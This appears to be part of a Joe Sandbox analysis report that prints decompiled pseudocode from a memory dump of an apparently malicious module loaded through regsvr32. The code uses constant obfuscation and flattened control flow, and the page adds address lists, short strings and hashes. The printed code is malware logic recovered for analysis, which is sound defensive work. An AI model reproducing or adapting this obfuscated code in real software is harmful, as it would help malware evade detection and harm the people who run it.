										_v172 = _v172 ^ 0x6004c7a0;
										_v172 = _v172 ^ 0x041bbead;
										_v172 = _v172 >> 0xb;
										_v172 = _v172 ^ 0x0004ca48;
										_t303 = E04F7D6A7(_v164, _v168, _v160, 0x4f61060, _v172);
										_push(_t336);
										_push( &_v128);
										_push(_t303);
										_push(_t391);
										_push(_t384);
										 *((intOrPtr*)(E04F79F15(_v164, 0xb1d024bf, 0x101)))();
										_v156 = 0x8e1f8c;
										_v156 = _v156 >> 0xe;
										_v156 = _v156 ^ 0x00045a3f;
										_v164 = 0xa91591;
										_v164 = _v164 + 0x2086;
										_t347 = 0x61;
										_v164 = _v164 / _t347;
										_v164 = _v164 ^ 0x000cc6c5;
										_v168 = 0x5a07d1;
										_t348 = 0x34;
										_v168 = _v168 / _t348;
										_v168 = _v168 | 0x589740f7;
										_v168 = _v168 ^ 0x5890a7a9;
										_v172 = 0xac037d;
										_v172 = _v172 + 0xffffbf34;
										_t349 = 0xc;
										_v172 = _v172 / _t349;
										_v172 = _v172 ^ 0x000b6802;
										E04F6845B(_v156, _v164, _v168, _v172, _t303);
										_t338 = _v148;
										_t393 =  &(_t393[0xb]);
										_t290 = 0xaa28;
										goto L1;
									} else {
										if(_t290 != 0xd3d18) {
											L16:
											__eflags = _t290 - 0x7f40f;
											if(__eflags != 0) {
												continue;
											}
										} else {
											_v164 = 0x4bd15d;
											_v164 = _v164 >> 1;
											_t351 = 0x14;
											_push(_t351);
											_v164 = _v164 / _t351;
											_v164 = _v164 ^ 0x0001e53a;
											_v152 = 0x5426f;
											_v152 = _v152 + 0xffff4c3f;
											_v152 = _v152 | 0x25484310;
											_v152 = _v152 << 6;
											_v152 = _v152 ^ 0x5333ef90;
											_v160 = 0x8ad51;
											_v160 = _v160 ^ 0xac3a88c4;
											_v160 = _v160 * 0x32;
											_v160 = _v160 ^ 0xa1cd4a34;
											_v172 = 0x81212f;
											_v172 = _v172 * 0x58;
											_v172 = _v172 + 0xffffe1c5;
											_v172 = _v172 ^ 0x2c6d1d57;
											_v168 = 0x35dd56;
											_v168 = _v168 << 6;
											_v168 = _v168 ^ 0x0d784067;
											_t322 = E04F6F826(_v164, _t351, _v152);
											_v156 = 0x3ba51;
											_t391 = _t322;
											_v156 = _v156 + 0xffff35fe;
											_v156 = _v156 ^ 0x00067705;
											_v168 = 0xc86e5;
											_v168 = _v168 >> 1;
											_v168 = _v168 << 3;
											_v168 = _v168 ^ 0x0030dc52;
											_v172 = 0x50e90e;
											_v172 = _v172 + 0x993e;
											_v172 = _v172 >> 3;
											_v172 = _v172 << 0xf;
											_v172 = _v172 ^ 0x182f3942;
											_v160 = 0x3fadfe;
											_v160 = _v160 >> 4;
											_v160 = _v160 + 0x8219;
											_v160 = _v160 + 0xdf9;
											_v160 = _v160 ^ 0x0004e0a7;
											_v152 = 0x4f8040;
											_t353 = 0x56;
											_v152 = _v152 / _t353;
											_v152 = _v152 + 0xffff1483;
											_t354 = 0x15;
											_v152 = _v152 / _t354;
											_v152 = _v152 ^ 0x00000006;
											_v144 = 0x81cdea;
											_v144 = _v144 << 3;
											_v144 = _v144 ^ 0x040e6f51;
											_v164 = 0xdc27df;
											_t355 = 0x64;
											_v164 = _v164 / _t355;
											_t356 = 0x16;
											_v164 = _v164 / _t356;
											_v164 = _v164 ^ 0x0000199c;
											_push(_v164 | _v144 | _v152);
											_push(_v160);
											_push(_v172);
											_push(_t391);
											_push(_v168);
											E04F759FA( &_v128, _v156);
											_t393 =  &(_t393[8]);
											_t290 = 0x6ce3a;
											L9:
											_t338 = _v148;
											continue;
										}
									}
								}
							}
						}
						return _t384;
					}
					_v160 = 0xd7c807;
					_v160 = _v160 << 0xd;
					_t339 = 0x58;
					_v160 = _v160 / _t339;
					_v160 = _v160 << 0x10;
					_v160 = _v160 ^ 0x5faae924;
					_v156 = 0x4758d5;
					_v156 = _v156 + 0xb85d;
					_v156 = _v156 ^ 0x004af709;
					_v172 = 0x5b1e9d;
					_v172 = _v172 + 0xffff17e0;
					_v172 = _v172 * 0x14;
					_v172 = _v172 ^ 0xe34b8bb5;
					_t284 =  &_v172;
					 *_t284 = _v172 ^ 0xe44b7c6e;
					__eflags =  *_t284;
					_t286 =  &_v172; // 0xe44b7c6e
					E04F7E4B2(_v160, _v156,  *_t284,  *_t286, _t336);
					_t338 = _v148;
					_t290 = 0x7f40f;
					goto L16;
				}
			}

0x04f7b45c
0x04f7b45c
0x04f7b462
0x04f7b467
0x04f7b46c
0x04f7b473
0x04f7b477
0x04f7b47b
0x04f7b481
0x04f7b485
0x04f7b48d
0x04f7b48d
0x04f7b492
0x04f7b4a2
0x04f7b8b7
0x04f7b8bf
0x04f7b8c7
0x04f7b8cf
0x04f7b8d7
0x04f7b8dd
0x04f7b8e5
0x04f7b8ed
0x04f7b8f5
0x04f7b8fd
0x04f7b905
0x04f7b90d
0x04f7b912
0x04f7b922
0x04f7b928
0x04f7b92f
0x04f7b932
0x00000000
0x04f7b4a8
0x04f7b4ad
0x04f7b8ad
0x00000000
0x04f7b4b3
0x04f7b4b8
0x04f7b82b
0x04f7b833
0x04f7b83b
0x04f7b843
0x04f7b84b
0x04f7b853
0x04f7b858
0x04f7b860
0x04f7b868
0x04f7b870
0x04f7b878
0x04f7b896
0x04f7b898
0x04f7b89b
0x04f7b89d
0x04f7b8a3
0x00000000
0x04f7b8a3
0x04f7b4be
0x04f7b4c0
0x04f7b6b3
0x04f7b6bb
0x04f7b6cb
0x04f7b6d3
0x04f7b6db
0x04f7b6e3
0x04f7b6e8
0x04f7b6f0
0x04f7b6f8
0x04f7b702
0x04f7b706
0x04f7b70b
0x04f7b713
0x04f7b71b
0x04f7b723
0x04f7b72b
0x04f7b730
0x04f7b74d
0x04f7b760
0x04f7b761
0x04f7b762
0x04f7b763
0x04f7b764
0x04f7b770
0x04f7b772
0x04f7b77c
0x04f7b781
0x04f7b789
0x04f7b791
0x04f7b79f
0x04f7b7a4
0x04f7b7aa
0x04f7b7b2
0x04f7b7be
0x04f7b7c3
0x04f7b7c9
0x04f7b7d1
0x04f7b7d9
0x04f7b7e1
0x04f7b7f5
0x04f7b7f9
0x04f7b7fd
0x04f7b815
0x04f7b81a
0x04f7b81e
0x04f7b821
0x00000000
0x04f7b4c6
0x04f7b4cb
0x04f7b9c1
0x04f7b9c1
0x04f7b9c6
0x00000000
0x00000000
0x04f7b4d1
0x04f7b4d1
0x04f7b4db
0x04f7b4e5
0x04f7b4e8
0x04f7b4e9
0x04f7b4ed
0x04f7b4f5
0x04f7b4fd
0x04f7b505
0x04f7b50d
0x04f7b512
0x04f7b51a
0x04f7b522
0x04f7b52f
0x04f7b533
0x04f7b53b
0x04f7b548
0x04f7b54c
0x04f7b554
0x04f7b55c
0x04f7b564
0x04f7b569
0x04f7b586
0x04f7b58b
0x04f7b593
0x04f7b595
0x04f7b59f
0x04f7b5a7
0x04f7b5af
0x04f7b5b3
0x04f7b5b8
0x04f7b5c0
0x04f7b5c8
0x04f7b5d0
0x04f7b5d5
0x04f7b5da
0x04f7b5e2
0x04f7b5ea
0x04f7b5ef
0x04f7b5f7
0x04f7b5ff
0x04f7b607
0x04f7b615
0x04f7b61a
0x04f7b620
0x04f7b62c
0x04f7b631
0x04f7b637
0x04f7b63c
0x04f7b644
0x04f7b649
0x04f7b651
0x04f7b65d
0x04f7b662
0x04f7b66c
0x04f7b673
0x04f7b677
0x04f7b68b
0x04f7b68c
0x04f7b690
0x04f7b694
0x04f7b695
0x04f7b69d
0x04f7b6a2
0x04f7b6a5
0x04f7b6aa
0x04f7b6aa
0x00000000
0x04f7b6aa
0x04f7b4cb
0x04f7b4c0
0x04f7b4b8
0x04f7b4ad
0x04f7b9d8
0x04f7b9d8
0x04f7b93a
0x04f7b944
0x04f7b94f
0x04f7b953
0x04f7b957
0x04f7b95c
0x04f7b964
0x04f7b96c
0x04f7b974
0x04f7b97c
0x04f7b984
0x04f7b991
0x04f7b995
0x04f7b99d
0x04f7b99d
0x04f7b99d
0x04f7b9a5
0x04f7b9b1
0x04f7b9b8
0x04f7b9bc
0x00000000
0x04f7b9bc

Strings

"MI, xrefs: 04F7B713
x, xrefs: 04F7B485
g@x, xrefs: 04F7B569
n|K, xrefs: 04F7B9A5

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "MI$g@x$n|K$x
API String ID: 0-3326364923
Opcode ID: 3ed147e5e56e4238d29bf13f4ab06fb9343769d3b4152475238c718efac8541d
Instruction ID: 7f549669fb9aed8e1ec5642ad0f9bce83aa68fac3483bad669287dbbcad7fe6c
Opcode Fuzzy Hash: 3ed147e5e56e4238d29bf13f4ab06fb9343769d3b4152475238c718efac8541d
Instruction Fuzzy Hash: 9CE100715083419FD348CF25D58990BBBE1FBC8758F108A1DF1D9A6260D3B9EA4A8F87

Uniqueness

Uniqueness Score: -1.00%

Function 04F77915 Relevance: 5.3, Strings: 4, Instructions: 265
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04F77915() {
				char _v520;
				char _v1040;
				void* _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				intOrPtr _t267;
				void* _t281;
				intOrPtr _t286;
				void* _t293;
				void* _t301;
				signed int _t302;
				signed int _t303;
				signed int _t305;
				signed int _t309;
				signed int _t310;
				signed int _t312;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				intOrPtr _t337;
				signed int _t352;
				signed int* _t355;

				_t355 =  &_v1076;
				_v1056 = 0x284e8;
				_t301 = 0x8f1f0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				while(1) {
					L1:
					_t352 = 0x71;
					do {
						while(_t301 != 0x2f997) {
							if(_t301 == 0x747b6) {
								_v1076 = 0x5dd0d0;
								_t302 = 0x7d;
								_v1076 = _v1076 / _t302;
								_v1076 = _v1076 + 0xfffffad6;
								_t303 = 0x1f;
								_v1076 = _v1076 / _t303;
								_v1076 = _v1076 ^ 0x00027fbf;
								E04F7FC6F();
								_t301 = 0xb92bf;
								continue;
							}
							if(_t301 == 0x8f1f0) {
								_t267 =  *0x4f8221c; // 0x33fd420
								__eflags =  *(_t267 + 0x20c);
								_t301 =  !=  ? 0x747b6 : 0x2f997;
								continue;
							}
							if(_t301 == 0xafd33) {
								_v1072 = 0xabaf54;
								_t305 = 0x7b;
								_v1072 = _v1072 / _t305;
								_v1072 = _v1072 ^ 0x000d8acf;
								_v1060 = 0xa35652;
								_v1060 = _v1060 >> 4;
								_v1060 = _v1060 ^ 0x000de711;
								 *((short*)(E04F73E30(_v1072,  &_v1040, _v1060))) = 0;
								_v1068 = 0xa2d247;
								_v1068 = _v1068 ^ 0xa2600f34;
								_v1068 = _v1068 + 0xcfdf;
								_v1068 = _v1068 ^ 0xa2caa0cf;
								_v1060 = 0xcfe101;
								_v1060 = _v1060 + 0x4707;
								_v1060 = _v1060 ^ 0x00df8a11;
								_v1072 = 0x5e146;
								_v1072 = _v1072 / _t352;
								_v1072 = _v1072 * 0x7b;
								_t252 =  &_v1072;
								 *_t252 = _v1072 ^ 0x0007c231;
								__eflags =  *_t252;
								return E04F6C95C(_v1068, _v1060,  &_v1040, _v1072);
							}
							if(_t301 == 0xb92bf) {
								_v1064 = 0xdb42d;
								_v1064 = _v1064 + 0xffffcf81;
								_v1064 = _v1064 ^ 0x000a2e01;
								_v1068 = 0xa6a2b9;
								_t309 = 0x79;
								_v1068 = _v1068 / _t309;
								_v1068 = _v1068 ^ 0x000eaaa5;
								_v1076 = 0x858dba;
								_t310 = 0x36;
								_v1076 = _v1076 * 0x27;
								_v1076 = _v1076 + 0xc5cb;
								_v1076 = _v1076 / _t310;
								_v1076 = _v1076 ^ 0x006c6ca6;
								_v1072 = 0x406a70;
								_v1072 = _v1072 | 0xf90cd94b;
								_v1072 = _v1072 ^ 0xf94a1157;
								_t281 = E04F7D6A7(_v1064, _v1068, _v1076, 0x4f613ec, _v1072);
								_v1068 = 0x3029a7;
								_t312 = 0x57;
								_v1068 = _v1068 / _t312;
								_v1068 = _v1068 >> 3;
								_v1068 = _v1068 ^ 0x000106bb;
								_v1060 = 0xe62b5b;
								_v1060 = _v1060 + 0xf0be;
								_v1060 = _v1060 ^ 0x00e88b30;
								_v1072 = 0x5eb99b;
								_v1072 = _v1072 | 0x5267e489;
								_v1072 = _v1072 ^ 0x527b03ab;
								_v1064 = 0x8d051;
								_v1064 = _v1064 << 8;
								_v1064 = _v1064 + 0xfffff207;
								_v1064 = _v1064 ^ 0xfd0506b1;
								_v1064 = _v1064 ^ 0xf5d04bc9;
								_v1076 = 0x7d4ff5;
								_v1076 = _v1076 + 0x60b8;
								_v1076 = _v1076 + 0xffffb61e;
								_v1076 = _v1076 * 0x2f;
								_v1076 = _v1076 ^ 0x170117d6;
								_t286 =  *0x4f8221c; // 0x33fd420
								_t337 =  *0x4f8221c; // 0x33fd420
								E04F736BB(_t337 + 4, __eflags, _t312, _v1060, _t286 + 0x220, _v1072, _v1064, _t281, _v1076,  &_v1040);
								_v1072 = 0xd1ecfa;
								_v1072 = _v1072 + 0xd3db;
								_v1072 = _v1072 + 0x5334;
								_v1072 = _v1072 ^ 0x00d8c53d;
								_v1076 = 0x388c0a;
								_v1076 = _v1076 | 0x53d58391;
								_v1076 = _v1076 + 0xffff47a5;
								_t314 = 0x25;
								_v1076 = _v1076 / _t314;
								_v1076 = _v1076 ^ 0x02477189;
								_v1064 = 0xc12508;
								_v1064 = _v1064 | 0x3afe0105;
								_v1064 = _v1064 + 0xffffd10b;
								_v1064 = _v1064 ^ 0x3af56121;
								_v1068 = 0x82f954;
								_v1068 = _v1068 + 0xffffcd16;
								_t315 = 0x53;
								_v1068 = _v1068 / _t315;
								_v1068 = _v1068 ^ 0x000e62d3;
								_t293 = E04F6845B(_v1072, _v1076, _v1064, _v1068, _t281);
								_t355 =  &(_t355[0xe]);
								_t301 = 0xdc678;
								goto L1;
							}
							_t364 = _t301 - 0xdc678;
							if(_t301 != 0xdc678) {
								goto L13;
							}
							_v1076 = 0x6f94c3;
							_v1076 = _v1076 ^ 0x9678e998;
							_v1076 = _v1076 + 0xffff26cc;
							_v1076 = _v1076 | 0x3a75491c;
							_v1076 = _v1076 ^ 0xbe7a4c96;
							_v1064 = 0xbfda6;
							_v1064 = _v1064 << 4;
							_v1064 = _v1064 >> 5;
							_t317 = 0x43;
							_v1064 = _v1064 / _t317;
							_v1064 = _v1064 ^ 0x000c6e25;
							E04F71DCF( &_v520, _v1076, _v1064);
							_v1068 = 0xe720ac;
							_v1068 = _v1068 + 0xffff462e;
							_v1068 = _v1068 ^ 0x00ec3e67;
							_v1072 = 0x2095b6;
							_v1072 = _v1072 + 0x69b1;
							_v1072 = _v1072 ^ 0x0029b531;
							_v1076 = 0x48a7f0;
							_v1076 = _v1076 / _t352;
							_v1076 = _v1076 + 0xe78c;
							_v1076 = _v1076 << 6;
							_v1076 = _v1076 ^ 0x0069e596;
							_t54 =  &_v1072; // 0xec3e67
							_t293 = E04F785A7( &_v520, _v1068, _t364,  &_v1040,  *_t54, _v1076);
							_t355 =  &(_t355[4]);
							_t301 = 0xafd33;
						}
						_v1060 = 0x7a43c7;
						_v1060 = _v1060 | 0x0637942b;
						_v1060 = _v1060 ^ 0x067e9383;
						_v1072 = 0xd125bc;
						_v1072 = _v1072 + 0xc706;
						_v1072 = _v1072 << 8;
						_t209 =  &_v1072;
						 *_t209 = _v1072 ^ 0xd1e0d61c;
						__eflags =  *_t209;
						E04F7481A();
						_t301 = 0xb92bf;
						L13:
						__eflags = _t301 - 0x8543;
					} while (_t301 != 0x8543);
					return _t293;
				}
			}

0x04f77915
0x04f7791f
0x04f7792d
0x04f77932
0x04f7793d
0x04f7793e
0x04f77944
0x04f77944
0x04f77946
0x04f77947
0x04f77947
0x04f77951
0x04f77cae
0x04f77cbe
0x04f77cc3
0x04f77cc9
0x04f77cd5
0x04f77cd8
0x04f77cdc
0x04f77ce8
0x04f77ced
0x00000000
0x04f77ced
0x04f7795d
0x04f77c98
0x04f77c9f
0x04f77ca6
0x00000000
0x04f77ca6
0x04f77969
0x04f77d49
0x04f77d59
0x04f77d60
0x04f77d64
0x04f77d6c
0x04f77d74
0x04f77d79
0x04f77d92
0x04f77d95
0x04f77d9d
0x04f77da5
0x04f77dad
0x04f77db5
0x04f77dbd
0x04f77dc5
0x04f77dcd
0x04f77ddb
0x04f77de4
0x04f77dec
0x04f77dec
0x04f77dec
0x00000000
0x04f77e06
0x04f77971
0x04f77a6b
0x04f77a75
0x04f77a7d
0x04f77a85
0x04f77a93
0x04f77a98
0x04f77a9e
0x04f77aa6
0x04f77ab3
0x04f77ab4
0x04f77ab8
0x04f77ac6
0x04f77aca
0x04f77ad2
0x04f77ada
0x04f77ae2
0x04f77aff
0x04f77b04
0x04f77b19
0x04f77b1c
0x04f77b20
0x04f77b25
0x04f77b2d
0x04f77b35
0x04f77b3d
0x04f77b45
0x04f77b4d
0x04f77b55
0x04f77b5d
0x04f77b65
0x04f77b6a
0x04f77b72
0x04f77b7a
0x04f77b82
0x04f77b8a
0x04f77b92
0x04f77b9f
0x04f77ba7
0x04f77bbd
0x04f77bcc
0x04f77bda
0x04f77bdf
0x04f77be7
0x04f77bef
0x04f77bf7
0x04f77bff
0x04f77c07
0x04f77c0f
0x04f77c1f
0x04f77c24
0x04f77c2a
0x04f77c32
0x04f77c3a
0x04f77c42
0x04f77c4a
0x04f77c52
0x04f77c5a
0x04f77c66
0x04f77c6a
0x04f77c6e
0x04f77c86
0x04f77c8b
0x04f77c8e
0x00000000
0x04f77c8e
0x04f77977
0x04f7797d
0x00000000
0x00000000
0x04f77983
0x04f7798d
0x04f77995
0x04f7799d
0x04f779a5
0x04f779ad
0x04f779b5
0x04f779ba
0x04f779c5
0x04f779cf
0x04f779d3
0x04f779e3
0x04f779e8
0x04f779f7
0x04f77a01
0x04f77a09
0x04f77a11
0x04f77a19
0x04f77a21
0x04f77a2f
0x04f77a37
0x04f77a3f
0x04f77a44
0x04f77a50
0x04f77a59
0x04f77a5e
0x04f77a61
0x04f77a61
0x04f77cf4
0x04f77cfc
0x04f77d04
0x04f77d0c
0x04f77d14
0x04f77d1c
0x04f77d21
0x04f77d21
0x04f77d21
0x04f77d31
0x04f77d36
0x04f77d38
0x04f77d38
0x04f77d38
0x00000000
0x04f77947

Strings

4S, xrefs: 04F77BEF
[+, xrefs: 04F77B2D
g>, xrefs: 04F77A50
pj@, xrefs: 04F77AD2

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4S$[+$g>$pj@
API String ID: 0-2262275575
Opcode ID: b9ac8e5c109d4f54e91f982a66b554183faf9b49ead4a3e0dd28a6bb1fb0708d
Instruction ID: fa52f235d0997de73090ce1eb2a4f9c9d51413db14bbae80fc5d776bef092446
Opcode Fuzzy Hash: b9ac8e5c109d4f54e91f982a66b554183faf9b49ead4a3e0dd28a6bb1fb0708d
Instruction Fuzzy Hash: 00C123715093429FD348DF21D94981BBBE2FBD4708F009E1EF59596260D7B8AA0ACF93

Uniqueness

Uniqueness Score: -1.00%

Function 04F7481A Relevance: 5.3, Strings: 4, Instructions: 255
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E04F7481A() {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t232;
				void* _t237;
				void* _t262;
				signed int _t268;
				intOrPtr _t269;
				intOrPtr* _t270;
				void* _t271;
				signed int _t272;
				signed int _t273;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t288;
				void* _t319;
				signed int* _t323;

				_t323 =  &_v56;
				_v16 = 0x2d5ea;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = 0;
				_t319 = 0xe8a91;
				_t268 = _v20;
				while(1) {
					L1:
					_t271 = 0x5c;
					while(1) {
						_t232 = 0x79b1b;
						do {
							L3:
							while(_t319 != 0x5b136) {
								if(_t319 == _t232) {
									_v48 = 0x549e0c;
									_t283 = 0x4c;
									_v48 = _v48 * 0x2d;
									_v48 = _v48 + 0xffff29b9;
									_v48 = _v48 ^ 0x0ed96a3c;
									_v52 = 0xdd872c;
									_v52 = _v52 * 0x41;
									_v52 = _v52 + 0xffff09aa;
									_t284 = 0x7a;
									_v52 = _v52 / _t283;
									_v52 = _v52 ^ 0x00be6feb;
									_v56 = 0x964077;
									_v56 = _v56 / _t284;
									_v56 = _v56 >> 1;
									_v56 = _v56 ^ 0x311165a4;
									_v56 = _v56 ^ 0x311f1f1f;
									_t262 = E04F78C03(_t268, _v24, _v48, _v52, _v56);
									_t323 =  &(_t323[3]);
									_t319 = 0xae17d;
									_v20 = 0 | _t262 == 0x00000000;
									goto L1;
								} else {
									if(_t319 == 0xae17d) {
										_v52 = 0xb91ffc;
										_v52 = _v52 | 0xd5f248d0;
										_v52 = _v52 << 3;
										_t288 = 0x15;
										_v52 = _v52 / _t288;
										_v52 = _v52 ^ 0x08514a3a;
										_v32 = 0x719833;
										_v32 = _v32 >> 6;
										_v32 = _v32 ^ 0x000c046e;
										_v28 = 0x23502e;
										_v28 = _v28 * 0x67;
										_v28 = _v28 ^ 0x0e33d602;
										E04F7F559(_v52, _v32, _v24, _v28);
									} else {
										if(_t319 == 0xe8a91) {
											_t319 = 0xf46db;
											continue;
										} else {
											if(_t319 != 0xf46db) {
												goto L15;
											} else {
												_t269 =  *0x4f8221c; // 0x33fd420
												_t270 = _t269 + 0x220;
												while( *_t270 != _t271) {
													_t270 = _t270 + 2;
												}
												_t268 = _t270 + 2;
												_t319 = 0x5b136;
												_t232 = 0x79b1b;
												continue;
											}
										}
									}
								}
								L18:
								return _v20;
							}
							_v44 = 0xb0db00;
							_t272 = 0x5a;
							_v44 = _v44 / _t272;
							_v44 = _v44 ^ 0x00097443;
							_v40 = 0xdddc4;
							_v40 = _v40 + 0xd029;
							_v40 = _v40 ^ 0x000ec016;
							_v52 = 0x61cbfa;
							_v52 = _v52 + 0xf8f3;
							_v52 = _v52 ^ 0xb9445f92;
							_v52 = _v52 ^ 0xb925c4f1;
							_v48 = 0xcb27;
							_t273 = 0x2c;
							_v48 = _v48 / _t273;
							_v48 = _v48 + 0x8755;
							_v48 = _v48 ^ 0x0008310b;
							_t237 = E04F7D6A7(_v44, _v40, _v52, 0x4f6145c, _v48);
							_v52 = 0x5eca3d;
							_v52 = _v52 ^ 0xa8ae6248;
							_v52 = _v52 | 0x1fbec116;
							_v52 = _v52 + 0xffff85b4;
							_v52 = _v52 ^ 0x3ffe6f2a;
							_v28 = 0xdeddf2;
							_t275 = 0x68;
							_v28 = _v28 * 0x1d;
							_v28 = _v28 ^ 0x193f2468;
							_v40 = 0x8e96b;
							_v40 = _v40 ^ 0x69441547;
							_v40 = _v40 / _t275;
							_v40 = _v40 ^ 0x010ffd23;
							_v56 = 0x2bbdee;
							_v56 = _v56 >> 9;
							_v56 = _v56 | 0x4bfb413b;
							_v56 = _v56 >> 4;
							_v56 = _v56 ^ 0x04b4fc2c;
							_v32 = 0x25a8ae;
							_t276 = 0x11;
							_v32 = _v32 / _t276;
							_v32 = _v32 ^ 0x00008c56;
							_v44 = 0xf8a0ff;
							_v44 = _v44 + 0xffff5cba;
							_v44 = _v44 | 0x8ce9ffff;
							_v44 = _v44 ^ 0x8cf14982;
							_v36 = 0xba9e0c;
							_v36 = _v36 ^ 0xa24ee01d;
							_v36 = _v36 ^ 0xa2f4c358;
							_v48 = 0x690ccb;
							_t277 = 0x26;
							_v48 = _v48 / _t277;
							_v48 = _v48 + 0xffffcb2e;
							_v48 = _v48 ^ 0x0004b594;
							E04F6CBEC(_v40, _t277, _v56, _v28, _v32, _v44, _t237, _t277, _v36, _t277, _t277, _v52,  &_v24, _v48);
							_v56 = 0x4e0d99;
							_t319 =  ==  ? 0x79b1b : 0x62366;
							_v56 = _v56 >> 0xf;
							_v56 = _v56 + 0xffff7e1b;
							_t279 = 0x1e;
							_v56 = _v56 * 0x7a;
							_v56 = _v56 ^ 0xffcaf77a;
							_v40 = 0x15b0e3;
							_v40 = _v40 + 0xffff6f29;
							_v40 = _v40 << 6;
							_v40 = _v40 ^ 0x0541da47;
							_v52 = 0x7da1fe;
							_t280 = 0x51;
							_v52 = _v52 / _t279;
							_v52 = _v52 / _t280;
							_v52 = _v52 + 0x7f71;
							_v52 = _v52 ^ 0x0005df6d;
							_v28 = 0x8a3e3d;
							_t281 = 0x2f;
							_v28 = _v28 / _t281;
							_v28 = _v28 ^ 0x000c9ce5;
							E04F6845B(_v56, _v40, _v52, _v28, _t237);
							_t323 =  &(_t323[0x13]);
							_t232 = 0x79b1b;
							_t271 = 0x5c;
							L15:
						} while (_t319 != 0x62366);
						goto L18;
					}
				}
			}

0x04f7481a
0x04f74823
0x04f74834
0x04f74835
0x04f74836
0x04f74839
0x04f7483d
0x04f74842
0x04f74846
0x04f74846
0x04f74848
0x04f74849
0x04f74849
0x04f7484e
0x00000000
0x04f7484e
0x04f74858
0x04f7489e
0x04f748af
0x04f748b2
0x04f748b6
0x04f748be
0x04f748c6
0x04f748d3
0x04f748d7
0x04f748e5
0x04f748e6
0x04f748ec
0x04f748f4
0x04f74904
0x04f74908
0x04f7490c
0x04f74914
0x04f7492c
0x04f74933
0x04f74938
0x04f74940
0x00000000
0x04f7485a
0x04f74860
0x04f74bf3
0x04f74bfd
0x04f74c05
0x04f74c10
0x04f74c13
0x04f74c17
0x04f74c1f
0x04f74c27
0x04f74c2c
0x04f74c34
0x04f74c41
0x04f74c45
0x04f74c5d
0x04f74866
0x04f7486c
0x04f74897
0x00000000
0x04f7486e
0x04f74874
0x00000000
0x04f7487a
0x04f7487a
0x04f74880
0x04f7488b
0x04f74888
0x04f74888
0x04f74890
0x04f74893
0x04f74849
0x00000000
0x04f74849
0x04f74874
0x04f7486c
0x04f74860
0x04f74c64
0x04f74c6f
0x04f74c6f
0x04f74949
0x04f74959
0x04f7495e
0x04f74964
0x04f7496c
0x04f74974
0x04f7497c
0x04f74984
0x04f7498c
0x04f74994
0x04f7499c
0x04f749a4
0x04f749b0
0x04f749b3
0x04f749b7
0x04f749bf
0x04f749dc
0x04f749e1
0x04f749eb
0x04f749f6
0x04f74a00
0x04f74a08
0x04f74a10
0x04f74a1f
0x04f74a22
0x04f74a26
0x04f74a2e
0x04f74a36
0x04f74a46
0x04f74a4a
0x04f74a52
0x04f74a5a
0x04f74a5f
0x04f74a67
0x04f74a6c
0x04f74a74
0x04f74a80
0x04f74a85
0x04f74a8b
0x04f74a93
0x04f74a9b
0x04f74aa3
0x04f74aab
0x04f74ab3
0x04f74abb
0x04f74ac3
0x04f74acb
0x04f74ad7
0x04f74ada
0x04f74ae2
0x04f74aea
0x04f74b18
0x04f74b1d
0x04f74b31
0x04f74b34
0x04f74b39
0x04f74b4a
0x04f74b4d
0x04f74b51
0x04f74b59
0x04f74b61
0x04f74b69
0x04f74b6e
0x04f74b76
0x04f74b84
0x04f74b85
0x04f74b93
0x04f74b99
0x04f74ba1
0x04f74ba9
0x04f74bb5
0x04f74bb9
0x04f74bbd
0x04f74bd5
0x04f74bda
0x04f74bdd
0x04f74be4
0x04f74be5
0x04f74be5
0x00000000
0x04f74bf1
0x04f74849

Strings

}, xrefs: 04F74938
.P#, xrefs: 04F74C34
}, xrefs: 04F7485A
Ct, xrefs: 04F74964

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .P#$Ct$}$}
API String ID: 0-399602862
Opcode ID: 9d7cb3c6f27eaa2c77641fbbf46313d4663c02f0082d2acf9e6d325f360d300c
Instruction ID: 430d7ef20819019b29c21e7ee531f2981928d0fd6d80f68fbb2d64967184eb9f
Opcode Fuzzy Hash: 9d7cb3c6f27eaa2c77641fbbf46313d4663c02f0082d2acf9e6d325f360d300c
Instruction Fuzzy Hash: A1B136726083419FD348CF25D94990BBBE2FBC8758F00891EF58996260D7B9DA4ACF47

Uniqueness

Uniqueness Score: -1.00%

Function 04F6CED3 Relevance: 5.2, Strings: 4, Instructions: 235
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04F6CED3(signed int __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
